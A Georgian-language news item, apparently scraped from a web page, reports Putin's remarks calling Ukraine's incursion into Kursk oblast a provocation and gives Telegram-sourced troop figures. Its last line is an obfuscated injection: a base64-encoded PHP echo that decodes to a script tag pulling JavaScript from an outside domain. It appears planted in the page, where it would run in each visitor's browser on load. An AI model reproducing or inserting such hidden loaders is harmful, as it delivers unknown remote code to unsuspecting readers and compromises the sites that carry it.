celsiusi
ავერსი საქკაბელი

 რუსეთის პრეზიდენტის, ვლადიმერ პუტინის განცხადებით, კურსკის ოლქში უკრაინის შეჭრა დიდ პროვოკაციას წარმოადგენს.

როგორც პუტინმა აღნიშნა, შეხვდება კონკრეტული უწყების წარმომადგენლებს, რათა განიხილონ თუ რა ვითარებაა ამჟამად კურსკის ოლქში.

„კიევის რეჟიმმა მოაწყო მორიგი მასშტაბური პროვოკაცია. ახორციელებს სამოქალაქო შენობების, საცხოვრებელი კორპუსების, სასწრაფო დახმარების მანქანების დაბომბვას სხვადასხვა ტიპის იარაღით, მათ შორის რაკეტებით. ჩვენი შეხვედრის შემდეგ, დაუყოვნებლივ მექნება შეხვედრა უსაფრთხოების უწყებების ხელმძღვანელებთან – თავდაცვის სამინისტროსთან, გენერალურ შტაბთან, „ეფესბესთან“, ვგულისხმობ, ფედერალური უშიშროების სამსახურის საზღვრის კონტროლის დეპარტამენტს და კოლეგებისგან კიდევ ერთ ანგარიშს მოვისმენთ“, – განაცხადა ვლადიმერ პუტინმა.

უკრაინის შეიარაღებულმა ძალებმა რუსეთში, კურსკის ოლქში სამი დასახლება დაიკავეს. ტელეგრამ-არხების ცნობით, კურსკის ოლქში, საერთო ჯამში, 400 უკრაინელი სამხედროა შეჭრილი. კიდევ 2 000 უკრაინელი ჯარისკაცი კი განლაგებულია საზღვრის სიახლოვეს.

შვიდი აგვისტოს ღამით უკრაინულმა დრონებმა ორჯერ მიიტანეს შეტევა ქალაქ სუჯის სიახლოვეს.

113
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");